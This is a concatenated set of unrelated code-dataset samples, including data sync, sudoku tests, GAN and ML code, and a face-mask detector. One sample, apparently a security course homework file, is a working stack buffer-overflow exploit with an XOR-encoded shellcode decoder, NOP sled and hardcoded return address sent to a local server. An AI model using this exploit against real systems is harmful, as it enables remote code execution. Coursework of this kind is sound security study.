new_data = datautil.stringify_key_values(new_data)
else:
new_data = []
# get current signal status DATASET and metadata from socrata
sig_status = socratautil.Soda(resource=SOCR_SIG_STAT_RES_ID)
# add special socrata deleted field
# required for sending delete requests to socrata
fieldnames = sig_status.fieldnames + [":deleted"]
# transform signal status socrata data for comparison
# with "new" data from kits
sig_status_data = datautil.reduce_to_keys(sig_status.data, fieldnames)
date_fields = sig_status.date_fields
sig_status_data = socratautil.strip_geocoding(sig_status_data)
sig_status_data = datautil.stringify_key_values(sig_status_data)
# identify signals whose status (OPERATION_STATE) has changed
cd_results = datautil.detect_changes(
sig_status_data,
new_data,
"signal_id",
# only a change in operation state
# triggers an update to socrata DATASET
keys=["operation_state"],
)
if cd_results["new"] or cd_results["change"] or cd_results["delete"]:
adds = add_ids(cd_results["new"])
deletes = socratautil.prepare_deletes(cd_results["delete"], "signal_id")
payload = adds + cd_results["change"]
payload = add_timestamps(payload)
payload = payload + deletes
payload = datautil.reduce_to_keys(payload, fieldnames)
results = socratautil.Soda(
auth=SOCRATA_CREDENTIALS,
records=payload,
resource=SOCR_SIG_STAT_RES_ID,
date_fields=None,
lat_field="location_latitude",
lon_field="location_longitude",
location_field="location",
replace=False,
source="kits"
)
return len(payload)
else:
return 0
if __name__ == "__main__":
main()
| StarcoderdataPython |
4847767 | import os
# Local directory of CypherCat API
VARGAN_DIR = os.path.dirname(os.path.abspath(__file__))
# Local directory containing entire repo
REPO_DIR = os.path.split(VARGAN_DIR)[0]
# Local directory for datasets
DATASETS_DIR = os.path.join(REPO_DIR, 'datasets')
# Local directory for runs
RUNS_DIR = os.path.join(REPO_DIR, 'runs')
| StarcoderdataPython |
3265026 | __author__ = '<NAME> <<EMAIL>>'
import unittest
from sudoku import solver
import time
class TestSudoku(unittest.TestCase):
def setUp(self):
self.sudoku = solver.Sudoku(max_iterations=1000, debug_print=False)
easy = ('830076042'
'600300097'
'000082100'
'090030005'
'026000730'
'300020010'
'003460000'
'170003006'
'260790054')
medium = ('050000006'
'480090003'
'903800000'
'017004000'
'600172005'
'000500810'
'000003508'
'700050041'
'800000090')
hard = ('003105060'
'000004008'
'060000507'
'056000000'
'094602150'
'000000620'
'509000040'
'600400000'
'040203900')
evil = ('005090400'
'700046000'
'000300090'
'600000020'
'090158030'
'080000009'
'060005000'
'000920001'
'008010900')
# complete
done = ('391286574'
'487359126'
'652714839'
'875431692'
'213967485'
'964528713'
'149673258'
'538142967'
'726895341')
# supposedly the world's hardest?
everest = ('800000000'
'003600000'
'070090200'
'050007000'
'000045700'
'000100030'
'001000068'
'008500010'
'090000400')
self.puzzle = evil # choose puzzle
def test_solve(self):
self.assertTrue(self.sudoku.get_input(self.puzzle))
self.assertTrue(self.sudoku.solve())
print('done in', self.sudoku.current)
def test_efficiency(self):
iterations, times = [], []
validity = 100
for i in range(validity):
if self.sudoku.get_input(self.puzzle):
start = time.clock()
self.assertTrue(self.sudoku.solve())
end = time.clock()
times.append(end - start)
progress = i / (validity / 100)
if progress % 10.0 == 0.0:
print(str(progress) + "%")
iterations.append(self.sudoku.current)
self.sudoku = solver.Sudoku(max_iterations=1000)
self.sudoku.get_input(self.puzzle)
print('--')
print('after', len(iterations), 'runs')
print('min iters:', str(min(iterations)) + ',',
'max iters:', max(iterations))
print('min time: ', str(round(min(times) * 1000, 2)) + ',',
'max time:', round(max(times) * 1000, 2))
print('average iters:', sum(iterations) / len(iterations))
print('average time: ', round((sum(times) / len(times) * 1000), 2))
if __name__ == '__main__':
unittest.main(exit=False) | StarcoderdataPython |
3462959 | <reponame>pwgbots/presto<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-08-18 13:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('presto', '0058_auto_20180816_1027'),
]
operations = [
migrations.RemoveField(
model_name='queuepicture',
name='sender',
),
migrations.AddField(
model_name='queuepicture',
name='course',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='presto.Course'),
),
]
| StarcoderdataPython |
6634317 | <filename>HW4/q3.py
#!/usr/bin/python
import os, socket
import q2
import assemble
HOST = '127.0.0.1'
SERVER_PORT = 8000
LOCAL_PORT = 1337
ASCII_MAX = 0x7f
def get_raw_shellcode():
return q2.get_shellcode()
def get_shellcode():
# sorry for solve this in morrom method, I dont have time to think on something more creative :/
# please don't hate me more
shellcode = get_raw_shellcode()
shellcode_len = len(shellcode)
new_shellcode = []
# Assumed the shellcode len is less then 80
# the assemble.py conevrt to hexa everything even when we inster nubmers
for i in xrange(shellcode_len):
byte = shellcode[i]
if ord(byte) >= 0x80:
byte = chr(ord(byte)^0xff)
new_shellcode.append(byte)
return "".join(new_shellcode)
def get_payload():
shellcode = get_shellcode() # the shellcode beofre chagned for ASCII
pre_shellcode = get_raw_shellcode() # the shellcode after chagned for ASCII
shellcode_len = len(shellcode) # the shellcode and the preshellcode are at the same size becaue we only change the value and not the size
eax_at_start = "push esp\npop eax\n" + "dec eax\n" * (shellcode_len + 4)
set_bl = "push 0\npop ebx\ndec ebx\n"
Decoder = eax_at_start + set_bl
for i in xrange(shellcode_len):
byte = pre_shellcode[i]
if ord(byte) >= 0x80:
Decoder += "xor byte ptr [eax], bl\n"
Decoder += "inc eax\n"
return_address = "\x04\xe0\xff\xbf" # 0xbfffe040
# can inc edx beacuse the shellcode reset him when she use him and it is only one byte
Decoder = assemble.assemble_data(Decoder)
new_shellcode = Decoder + shellcode
nop_silde_start = assemble.assemble_data("inc edx\n" * (1044 - len(return_address) - len(new_shellcode)))
size = chr(0) * 2 + chr(4) + chr(21) # this is 1044, the size of the message I send
to_send = size + nop_silde_start + new_shellcode + return_address
return to_send
def main():
payload = get_payload()
conn = socket.socket()
conn.connect((HOST, SERVER_PORT))
try:
conn.sendall(payload)
finally:
conn.close()
if __name__ == '__main__':
main()
| StarcoderdataPython |
3285825 | # -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : LeakGAN_G.py
# @Time : Created at 2019-04-25
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import math
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import config as cfg
from utils.helpers import truncated_normal_
dis_num_filters = [100, 200, 200, 200, 200, 100, 100, 100, 100, 100, 160, 160]
goal_out_size = sum(dis_num_filters)
class LeakGAN_G(nn.Module):
def __init__(self, embedding_dim, hidden_dim, vocab_size, max_seq_len, padding_idx, goal_size,
step_size, gpu=False):
super(LeakGAN_G, self).__init__()
self.name = 'leakgan'
self.hidden_dim = hidden_dim
self.embedding_dim = embedding_dim
self.max_seq_len = max_seq_len
self.vocab_size = vocab_size
self.padding_idx = padding_idx
self.goal_size = goal_size
self.goal_out_size = goal_out_size # equals to total_num_filters
self.step_size = step_size
self.gpu = gpu
self.temperature = 1.5
self.embeddings = nn.Embedding(vocab_size, embedding_dim, padding_idx=padding_idx)
self.worker = nn.LSTM(embedding_dim, hidden_dim)
self.manager = nn.LSTM(goal_out_size, hidden_dim)
self.work2goal = nn.Linear(hidden_dim, vocab_size * goal_size)
self.mana2goal = nn.Linear(hidden_dim, goal_out_size)
self.goal2goal = nn.Linear(goal_out_size, goal_size, bias=False)
self.goal_init = nn.Parameter(torch.rand((cfg.batch_size, goal_out_size)))
self.init_params()
def forward(self, idx, inp, work_hidden, mana_hidden, feature, real_goal, no_log=False, train=False):
"""
Embeds input and sample on token at a time (seq_len = 1)
:param idx: index of current token in sentence
:param inp: [batch_size]
:param work_hidden: 1 * batch_size * hidden_dim
:param mana_hidden: 1 * batch_size * hidden_dim
:param feature: 1 * batch_size * total_num_filters, feature of current sentence
:param real_goal: batch_size * goal_out_size, real_goal in LeakGAN source code
:param no_log: no log operation
:param train: if train
:return: out, cur_goal, work_hidden, mana_hidden
- out: batch_size * vocab_size
- cur_goal: batch_size * 1 * goal_out_size
"""
emb = self.embeddings(inp).unsqueeze(0) # 1 * batch_size * embed_dim
# Manager
mana_out, mana_hidden = self.manager(feature, mana_hidden) # mana_out: 1 * batch_size * hidden_dim
mana_out = self.mana2goal(mana_out.permute([1, 0, 2])) # batch_size * 1 * goal_out_size
cur_goal = F.normalize(mana_out, dim=-1)
_real_goal = self.goal2goal(real_goal) # batch_size * goal_size
_real_goal = F.normalize(_real_goal, p=2, dim=-1).unsqueeze(-1) # batch_size * goal_size * 1
# Worker
work_out, work_hidden = self.worker(emb, work_hidden) # work_out: 1 * batch_size * hidden_dim
work_out = self.work2goal(work_out).view(-1, self.vocab_size,
self.goal_size) # batch_size * vocab_size * goal_size
# Sample token
out = torch.matmul(work_out, _real_goal).squeeze(-1) # batch_size * vocab_size
# Temperature control
if idx > 1:
if train:
temperature = 1.0
else:
temperature = self.temperature
else:
temperature = self.temperature
out = temperature * out
if no_log:
out = F.softmax(out, dim=-1)
else:
out = F.log_softmax(out, dim=-1)
return out, cur_goal, work_hidden, mana_hidden
def sample(self, num_samples, batch_size, dis, start_letter=cfg.start_letter, train=False):
"""
Samples the network and returns num_samples samples of length max_seq_len.
:return: samples: batch_size * max_seq_len
"""
num_batch = num_samples // batch_size + 1 if num_samples != batch_size else 1
samples = torch.zeros(num_batch * batch_size, self.max_seq_len).long() # larger than num_samples
fake_sentences = torch.zeros((batch_size, self.max_seq_len))
for b in range(num_batch):
leak_sample, _, _, _ = self.forward_leakgan(fake_sentences, dis, if_sample=True, no_log=False
, start_letter=start_letter, train=False)
assert leak_sample.shape == (batch_size, self.max_seq_len)
samples[b * batch_size:(b + 1) * batch_size, :] = leak_sample
samples = samples[:num_samples, :]
return samples # cut to num_samples
def pretrain_loss(self, target, dis, start_letter=cfg.start_letter):
"""
Returns the pretrain_generator Loss for predicting target sequence.
Inputs: target, dis, start_letter
- target: batch_size * seq_len
"""
batch_size, seq_len = target.size()
_, feature_array, goal_array, leak_out_array = self.forward_leakgan(target, dis, if_sample=False, no_log=False,
start_letter=start_letter)
# Manager loss
mana_cos_loss = self.manager_cos_loss(batch_size, feature_array,
goal_array) # batch_size * (seq_len / step_size)
manager_loss = -torch.sum(mana_cos_loss) / (batch_size * (seq_len // self.step_size))
# Worker loss
work_nll_loss = self.worker_nll_loss(target, leak_out_array) # batch_size * seq_len
work_loss = torch.sum(work_nll_loss) / (batch_size * seq_len)
return manager_loss, work_loss
def adversarial_loss(self, target, rewards, dis, start_letter=cfg.start_letter):
"""
Returns a pseudo-loss that gives corresponding policy gradients (on calling .backward()).
Inspired by the example in http://karpathy.github.io/2016/05/31/rl/
Inputs: target, rewards, dis, start_letter
- target: batch_size * seq_len
- rewards: batch_size * seq_len (discriminator rewards for each token)
"""
batch_size, seq_len = target.size()
_, feature_array, goal_array, leak_out_array = self.forward_leakgan(target, dis, if_sample=False, no_log=False,
start_letter=start_letter, train=True)
# Manager Loss
t0 = time.time()
mana_cos_loss = self.manager_cos_loss(batch_size, feature_array,
goal_array) # batch_size * (seq_len / step_size)
mana_loss = -torch.sum(rewards * mana_cos_loss) / (batch_size * (seq_len // self.step_size))
# Worker Loss
work_nll_loss = self.worker_nll_loss(target, leak_out_array) # batch_size * seq_len
work_cos_reward = self.worker_cos_reward(feature_array, goal_array) # batch_size * seq_len
work_loss = -torch.sum(work_nll_loss * work_cos_reward) / (batch_size * seq_len)
return mana_loss, work_loss
def manager_cos_loss(self, batch_size, feature_array, goal_array):
"""
Get manager cosine distance loss
:return cos_loss: batch_size * (seq_len / step_size)
"""
# ===My implements===
# offset_feature = feature_array[:, 4:, :]
# # 不记录最后四个feature的变化
# all_feature = feature_array[:, :-4, :]
# all_goal = goal_array[:, :-4, :]
# sub_feature = offset_feature - all_feature
#
# # L2 normalization
# sub_feature = F.normalize(sub_feature, p=2, dim=-1)
# all_goal = F.normalize(all_goal, p=2, dim=-1)
#
# cos_loss = F.cosine_similarity(sub_feature, all_goal, dim=-1) # batch_size * (seq_len - 4)
#
# return cos_loss
# ===LeakGAN origin===
# get sub_feature and real_goal
# batch_size, seq_len = sentences.size()
sub_feature = torch.zeros(batch_size, self.max_seq_len // self.step_size, self.goal_out_size)
real_goal = torch.zeros(batch_size, self.max_seq_len // self.step_size, self.goal_out_size)
for i in range(self.max_seq_len // self.step_size):
idx = i * self.step_size
sub_feature[:, i, :] = feature_array[:, idx + self.step_size, :] - feature_array[:, idx, :]
if i == 0:
real_goal[:, i, :] = self.goal_init[:batch_size, :]
else:
idx = (i - 1) * self.step_size + 1
real_goal[:, i, :] = torch.sum(goal_array[:, idx:idx + 4, :], dim=1)
# L2 noramlization
sub_feature = F.normalize(sub_feature, p=2, dim=-1)
real_goal = F.normalize(real_goal, p=2, dim=-1)
cos_loss = F.cosine_similarity(sub_feature, real_goal, dim=-1)
return cos_loss
def worker_nll_loss(self, target, leak_out_array):
"""
Get NLL loss for worker
:return loss: batch_size * seq_len
"""
loss_fn = nn.NLLLoss(reduction='none')
loss = loss_fn(leak_out_array.permute([0, 2, 1]), target)
return loss
def worker_cos_reward(self, feature_array, goal_array):
"""
Get reward for worker (cosine distance)
:return: cos_loss: batch_size * seq_len
"""
for i in range(int(self.max_seq_len / self.step_size)):
real_feature = feature_array[:, i * self.step_size, :].unsqueeze(1).expand((-1, self.step_size, -1))
feature_array[:, i * self.step_size:(i + 1) * self.step_size, :] = real_feature
if i > 0:
sum_goal = torch.sum(goal_array[:, (i - 1) * self.step_size:i * self.step_size, :], dim=1, keepdim=True)
else:
sum_goal = goal_array[:, 0, :].unsqueeze(1)
goal_array[:, i * self.step_size:(i + 1) * self.step_size, :] = sum_goal.expand((-1, self.step_size, -1))
offset_feature = feature_array[:, 1:, :] # f_{t+1}, batch_size * seq_len * goal_out_size
goal_array = goal_array[:, :self.max_seq_len, :] # batch_size * seq_len * goal_out_size
sub_feature = offset_feature - goal_array
# L2 normalization
sub_feature = F.normalize(sub_feature, p=2, dim=-1)
all_goal = F.normalize(goal_array, p=2, dim=-1)
cos_loss = F.cosine_similarity(sub_feature, all_goal, dim=-1) # batch_size * seq_len
return cos_loss
def forward_leakgan(self, sentences, dis, if_sample, no_log=False, start_letter=cfg.start_letter, train=False):
"""
Get all feature and goals according to given sentences
:param sentences: batch_size * max_seq_len, not include start token
:param dis: discriminator model
:param if_sample: if use to sample token
:param no_log: if use log operation
:param start_letter:
:param train: if use temperature parameter
:return samples, feature_array, goal_array, leak_out_array:
- samples: batch_size * max_seq_len
- feature_array: batch_size * (max_seq_len + 1) * total_num_filter
- goal_array: batch_size * (max_seq_len + 1) * goal_out_size
- leak_out_array: batch_size * max_seq_len * vocab_size
"""
batch_size, seq_len = sentences.size()
feature_array = torch.zeros((batch_size, seq_len + 1, self.goal_out_size))
goal_array = torch.zeros((batch_size, seq_len + 1, self.goal_out_size))
leak_out_array = torch.zeros((batch_size, seq_len + 1, self.vocab_size))
samples = torch.zeros(batch_size, seq_len + 1).long()
work_hidden = self.init_hidden(batch_size)
mana_hidden = self.init_hidden(batch_size)
leak_inp = torch.LongTensor([start_letter] * batch_size)
# dis_inp = torch.LongTensor([start_letter] * batch_size)
real_goal = self.goal_init[:batch_size, :]
if self.gpu:
feature_array = feature_array.cuda()
goal_array = goal_array.cuda()
leak_out_array = leak_out_array.cuda()
goal_array[:, 0, :] = real_goal # g0 = goal_init
for i in range(seq_len + 1):
# Get feature
if if_sample:
dis_inp = samples[:, :seq_len]
else: # to get feature and goal
dis_inp = torch.zeros(batch_size, seq_len).long()
if i > 0:
dis_inp[:, :i] = sentences[:, :i] # cut sentences
leak_inp = sentences[:, i - 1]
if self.gpu:
dis_inp = dis_inp.cuda()
leak_inp = leak_inp.cuda()
feature = dis.get_feature(dis_inp).unsqueeze(0) # !!!note: 1 * batch_size * total_num_filters
feature_array[:, i, :] = feature.squeeze(0)
# Get output of one token
# cur_goal: batch_size * 1 * goal_out_size
out, cur_goal, work_hidden, mana_hidden = self.forward(i, leak_inp, work_hidden, mana_hidden, feature,
real_goal, no_log=no_log, train=train)
leak_out_array[:, i, :] = out
# ===My implement according to paper===
# Update real_goal and save goal
# if 0 < i < 4: # not update when i=0
# real_goal = torch.sum(goal_array, dim=1) # num_samples * goal_out_size
# elif i >= 4:
# real_goal = torch.sum(goal_array[:, i - 4:i, :], dim=1)
# if i > 0:
# goal_array[:, i, :] = cur_goal.squeeze(1) # !!!note: save goal after update last_goal
# ===LeakGAN origin===
# Save goal and update real_goal
goal_array[:, i, :] = cur_goal.squeeze(1)
if i > 0 and i % self.step_size == 0:
real_goal = torch.sum(goal_array[:, i - 3:i + 1, :], dim=1)
if i / self.step_size == 1:
real_goal += self.goal_init[:batch_size, :]
# Sample one token
if not no_log:
out = torch.exp(out)
out = torch.multinomial(out, 1).view(-1) # [batch_size] (sampling from each row)
samples[:, i] = out.data
leak_inp = out
# cut to seq_len
samples = samples[:, :seq_len]
leak_out_array = leak_out_array[:, :seq_len, :]
return samples, feature_array, goal_array, leak_out_array
def batchNLLLoss(self, target, dis, start_letter=cfg.start_letter):
# loss_fn = nn.NLLLoss()
# batch_size, seq_len = target.size()
_, _, _, leak_out_array = self.forward_leakgan(target, dis, if_sample=False, no_log=False,
start_letter=start_letter)
nll_loss = torch.mean(self.worker_nll_loss(target, leak_out_array))
return nll_loss
def init_hidden(self, batch_size=1):
h = torch.zeros(1, batch_size, self.hidden_dim)
c = torch.zeros(1, batch_size, self.hidden_dim)
if self.gpu:
return h.cuda(), c.cuda()
else:
return h, c
def init_goal(self, batch_size):
goal = torch.rand((batch_size, self.goal_out_size)).normal_(std=0.1)
goal = nn.Parameter(goal)
if self.gpu:
return goal.cuda()
else:
return goal
def split_params(self):
mana_params = list()
work_params = list()
mana_params += list(self.manager.parameters())
mana_params += list(self.mana2goal.parameters())
mana_params.append(self.goal_init)
work_params += list(self.embeddings.parameters())
work_params += list(self.worker.parameters())
work_params += list(self.work2goal.parameters())
work_params += list(self.goal2goal.parameters())
return mana_params, work_params
def init_params(self):
for param in self.parameters():
if param.requires_grad and len(param.shape) > 0:
stddev = 1 / math.sqrt(param.shape[0])
if cfg.gen_init == 'uniform':
torch.nn.init.uniform_(param, a=-0.05, b=0.05)
elif cfg.gen_init == 'normal':
torch.nn.init.normal_(param, std=stddev)
elif cfg.gen_init == 'truncated_normal':
truncated_normal_(param, std=stddev)
| StarcoderdataPython |
4998351 | import mock
from unittest import TestCase
from ncssl_api_client.services.crypto.csr_generator import CsrGenerator
class CsrGeneratorTest(TestCase):
@mock.patch('ncssl_api_client.services.crypto.csr_generator.Utils')
def test_generates_private_key(self, utils_mock):
crypto_config_mock = mock.MagicMock()
crypto_config_mock.get_key_size.return_value = 2048
crypto_config_mock.key_encryption_enabled.return_value = False
crypto_config_mock.get_subject.return_value = {}
utils_mock.normalize_cn = lambda x: x.replace('.', '_')
utils_mock.get_cert_dir.return_value = ''
utils_mock.update_path.return_value = None
with mock.patch('ncssl_api_client.services.crypto.csr_generator.CsrGenerator.openssl_exec') as openssl_exec_mock:
csr_generator = CsrGenerator(crypto_config_mock)
csr_generator.generate_csr('test.example.com')
self.assertEqual(csr_generator.openssl_exec.call_args_list[0],
mock.call(['genrsa', '-out', '/test_example_com.key', '2048']))
@mock.patch('ncssl_api_client.services.crypto.csr_generator.Utils')
def test_generates_encrypted_private_key(self, utils_mock):
crypto_config_mock = mock.MagicMock()
crypto_config_mock.get_key_size.return_value = 2048
crypto_config_mock.key_encryption_enabled.return_value = True
crypto_config_mock.get_subject.return_value = {}
crypto_config_mock.get_key_encryption_algorithm.return_value = '-aes256'
utils_mock.normalize_cn = lambda x: x.replace('.', '_')
utils_mock.get_cert_dir.return_value = ''
utils_mock.update_path.return_value = None
with mock.patch('ncssl_api_client.services.crypto.csr_generator.CsrGenerator.openssl_exec') as openssl_exec_mock:
csr_generator = CsrGenerator(crypto_config_mock)
csr_generator.generate_csr('test.example.com')
self.assertEqual(csr_generator.openssl_exec.call_args_list[0],
mock.call(['genrsa', '-aes256', '-out', '/test_example_com.key', '2048']))
@mock.patch('ncssl_api_client.services.crypto.csr_generator.Utils')
def test_generates_csr(self, utils_mock):
crypto_config_mock = mock.MagicMock()
crypto_config_mock.get_key_size.return_value = 2048
crypto_config_mock.key_encryption_enabled.return_value = False
crypto_config_mock.get_subject.return_value = {}
utils_mock.normalize_cn = lambda x: x.replace('.', '_')
utils_mock.get_cert_dir.return_value = ''
utils_mock.update_path.return_value = None
with mock.patch('ncssl_api_client.services.crypto.csr_generator.CsrGenerator.openssl_exec') as openssl_exec_mock:
csr_generator = CsrGenerator(crypto_config_mock)
csr_generator.generate_csr('test.example.com')
self.assertEqual(csr_generator.openssl_exec.call_args_list[1],
mock.call(['req', '-new', '-key', '/test_example_com.key', '-out', '/test_example_com.csr', '-subj', '/']))
| StarcoderdataPython |
8195852 | <gh_stars>0
n = int(input())
# dp 생성
dp = [0] * (n+1)
# dp 값 update
for i in range(2,n+1):
# dp 기본 값 생성
dp[i] = dp[i-1] + 1
# 2와 3 모두 나누기가 가능한 경우 3가지 case 비교
if i % 6 == 0:
dp[i] = min(dp[i//3]+1, dp[i//2]+1, dp[i])
# 3 나누기 가능한 경우 2가지 case 비교
elif i % 3 == 0:
dp[i] = min(dp[i//3]+1, dp[i])
# 2 나누기 가능한 경우 2가지 case 비교
elif i % 2 == 0:
dp[i] = min(dp[i//2]+1, dp[i])
print(dp[n])
| StarcoderdataPython |
1939082 | import torch
import torch.nn as nn
import numpy as np
def get_corrcoef(x):
if type(x) is torch.Tensor:
x = x.detach().cpu().numpy()
corr_mat = np.corrcoef(x, rowvar=False)
np.fill_diagonal(corr_mat, 0)
return np.abs(corr_mat).mean()
class MemoryWhitening1d(nn.Module):
def __init__(self, num_features, shuffle=False, momentum=0.9):
super(MemoryWhitening1d, self).__init__()
self.num_features = num_features
self.momentum = momentum
# self.register_buffer("running_mean", torch.zeros(self.num_features))
self.register_buffer('running_mean', None)
# self.register_buffer("running_covariance", torch.eye(self.num_features))
self.register_buffer('running_covariance', None)
self.x_last_batch = None
self.shuffle = shuffle
def forward(self, x):
N = x.shape[0]
# if self.x_last_batch is None:
# self.x_last_batch = torch.randn_like(x)
# x, self.x_last_batch = torch.cat([x, self.x_last_batch]), x.detach()
mean = x.mean(dim=0)
if self.running_mean is None:
self.running_mean = mean
else:
mean = self.running_mean = (1. - self.momentum) * self.running_mean.detach() + self.momentum * mean
x = x - mean
# import pdb
# pdb.set_trace()
cov = x.t().matmul(x) / (x.size(0) - 1)
if self.running_covariance is None:
self.running_covariance = cov
else:
cov = self.running_covariance = (1 - self.momentum) * self.running_covariance.detach() + self.momentum * cov
eigenvalues, eigenvectors = torch.symeig(cov.cpu(), eigenvectors=True, upper=True)
S, U = eigenvalues.to(x.device), eigenvectors.to(x.device)
self.eig = eigenvalues.min()
whitening_transform = U.matmul(S.rsqrt().diag()).matmul(U.t())
return x.matmul(whitening_transform)
if __name__ == "__main__":
batch_size = 512
num_features = 512
dn = DecorrelatedNorm(num_features, memory_size=None)
x = torch.randn((batch_size*2, num_features), requires_grad=True)
print(get_corrcoef(x))
'''
# y = torch.cat([), ])
# print(y)
dn(x[:batch_size])
y = dn(x[batch_size:])
print(get_corrcoef(y))
# print(dn.memory)
'''
# dn = DecorrelatedNorm(num_features, memory_size=None)
# dn = torch.nn.BatchNorm1d(num_features)
y = dn(x)
print(y)
print(get_corrcoef(y))
y.mean().backward()
x = torch.randn((batch_size*2, num_features), requires_grad=True)
# dn.zero_grad()
y = dn(x)
y.mean().backward()
# print(dn.memory)
| StarcoderdataPython |
3574500 | <filename>dassl/data/datasets/base_dataset.py
import os
import tarfile
import zipfile
from dassl.utils import check_isfile
import gdown
import os.path as osp
class Datum:
"""Data instance which defines the basic attributes.
Args:
impath (str, list, tuple): image path.
label (int): class label.
domain (int): domain label.
classname (str): class name.
"""
def __init__(self, impath='', label=0, domain=-1, classname=''):
assert isinstance(impath, (str, list, tuple))
# assert isinstance(label, int)
assert isinstance(domain, int)
assert isinstance(classname, str)
if isinstance(impath, (list, tuple)):
assert all([check_isfile(fpath) for fpath in impath])
else:
assert check_isfile(impath)
self._impath = impath
self._label = label
self._domain = domain
self._classname = classname
@property
def impath(self):
return self._impath
@property
def label(self):
return self._label
@property
def domain(self):
return self._domain
@property
def classname(self):
return self._classname
class DatasetBase:
"""A unified dataset class for
1) domain adaptation
2) domain generalization
3) semi-supervised learning
"""
dataset_dir = '' # directory which contains the dataset
domains = [] # string names of all domains
def __init__(self, train_x=None, train_u=None, val=None, test=None, outputs=None):
self._train_x = train_x # labeled training data
self._train_u = train_u # unlabeled training data (optional)
self._val = val # validation data (optional)
self._test = test # test data
if outputs: # Outputs describes nº outputs when we are building a regressor
self.set_num_classes(outputs)
self._lab2cname = None
else:
self._num_classes = self.get_num_classes(train_x)
self._lab2cname = self.get_label_classname_mapping(train_x)
@property
def train_x(self):
return self._train_x
@property
def train_u(self):
return self._train_u
@property
def val(self):
return self._val
@property
def test(self):
return self._test
@property
def lab2cname(self):
return self._lab2cname
@property
def num_classes(self):
return self._num_classes
def set_num_classes(self, int):
self._num_classes = int
def get_num_classes(self, data_source):
label_set = set()
for item in data_source:
label_set.add(item.label)
return max(label_set) + 1
def get_label_classname_mapping(self, data_source):
tmp = set()
for item in data_source:
tmp.add((item.label, item.classname))
mapping = {label: classname for label, classname in tmp}
return mapping
def check_input_domains(self, source_domains, target_domains):
self.is_input_domain_valid(source_domains)
self.is_input_domain_valid(target_domains)
def is_input_domain_valid(self, input_domains):
for domain in input_domains:
if domain not in self.domains:
raise ValueError(
'Input domain must belong to {}, '
'but got [{}]'.format(self.domains, domain)
)
def download_data(self, url, dst, from_gdrive=True):
if not osp.exists(osp.dirname(dst)):
os.makedirs(osp.dirname(dst))
if from_gdrive:
gdown.download(url, dst, quiet=False)
else:
raise NotImplementedError
print('Extracting file ...')
try:
tar = tarfile.open(dst)
tar.extractall(path=osp.dirname(dst))
tar.close()
except:
zip_ref = zipfile.ZipFile(dst, 'r')
zip_ref.extractall(osp.dirname(dst))
zip_ref.close()
print('File extracted to {}'.format(osp.dirname(dst)))
| StarcoderdataPython |
11373436 | import rclpy
from sensor_battery import battery_data_publisher_node as node
def main(args=None):
rclpy.init(args=args)
# Construct the publisher
battery_data_publisher = node.BatteryDataPublisher()
# Reading and publishing data at defined rate (2 seconds)
rclpy.spin(battery_data_publisher)
# Clean up when script is stopped
battery_data_publisher.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main() | StarcoderdataPython |
1998591 | <filename>CSCE/12.8.20/BankAccount.py<gh_stars>1-10
class BankAccount():
def __init__(self, accountnumber, balance):
self.accountnumber = accountnumber
self.balance = balance
def Check(self):
user = int(input('Enter the Account Number: '))
if(user == self.accountnumber):
print("The Balance is: $" + str(self.balance))
else:
print("Wrong Number")
| StarcoderdataPython |
5099756 | <filename>client/commands.py
from enum import Enum
class Command(Enum):
ADD_USER = "adduser"
PASSWORD = "<PASSWORD>"
LIST = "list"
LEADERS = "leaders"
LOGIN = "login"
LOGOUT = "logout"
BEGIN = "begin"
SEND = "send"
DELAY = "delay"
END = "end"
EXIT = "exit"
DEFAULT = "default"
SKIP = ""
@classmethod
def _missing_(cls, value):
return Command.DEFAULT
| StarcoderdataPython |
9699262 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 19 18:04:12 2020
@author: hamil
"""
#Importação das Bibliotecas necessaria para criação do algoritmo
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
from imutils.video import VideoStream
import imutils
import numpy as np
import cv2
import os
def detectar_mascara(frame, faceNet, maskNet):
(h, w) = frame.shape[:2]
bolha = cv2.dnn.blobFromImage(
frame, 1.0, (300, 300), (104.0, 177.0, 123.0))
faceNet.setInput(bolha)
detector = faceNet.forward()
print(detector.shape)
faces = []
locs = []
preds = []
for i in range(0, detector.shape[2]):
confidence = detector[0, 0, i, 2]
if confidence > 0.5:
box = detector[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(w - 1, endX), min(h - 1, endY))
face = frame[startY:endY, startX:endX]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
faces.append(face)
locs.append((startX, startY, endX, endY))
if len(faces) > 0:
faces = np.array(faces, dtype = "float32")
preds = maskNet.predict(faces, batch_size = 12)
return (locs, preds)
prototipoPath = r"D:\ProjectMultimidia\ProjectMultimidia\detector_face\deploy.prototxt"
pesosPatch = r"D:\ProjectMultimidia\ProjectMultimidia\detector_face\res10_300x300_ssd_iter_140000.caffemodel"
faceNet = cv2.dnn.readNet(prototipoPath, pesosPatch)
maskNet = load_model("D:\ProjectMultimidia\ProjectMultimidia\detector_mascara.model")
print("[INFO] Iniciando stream de vídeo")
vs = VideoStream(src = 0).start()
while True:
frame = vs.read()
frame = imutils.resize(frame, width = 400)
(locs, preds) = detectar_mascara(frame, faceNet, maskNet)
for (box, pred) in zip(locs, preds):
(startX, startY, endX, endY) = box
(mask, withoutMask) = pred
label = "Mask" if mask > withoutMask else "No Mask"
color = (0, 255, 0) if label == "Mask" else (0, 0, 255)
label = "{} : {:.2f}%".format(label, max(mask, withoutMask) * 100)
cv2.putText(frame, label, (startX, startY - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
cv2.destroyAllWindows()
vs.stop()
| StarcoderdataPython |
4813129 | <gh_stars>10-100
import sys
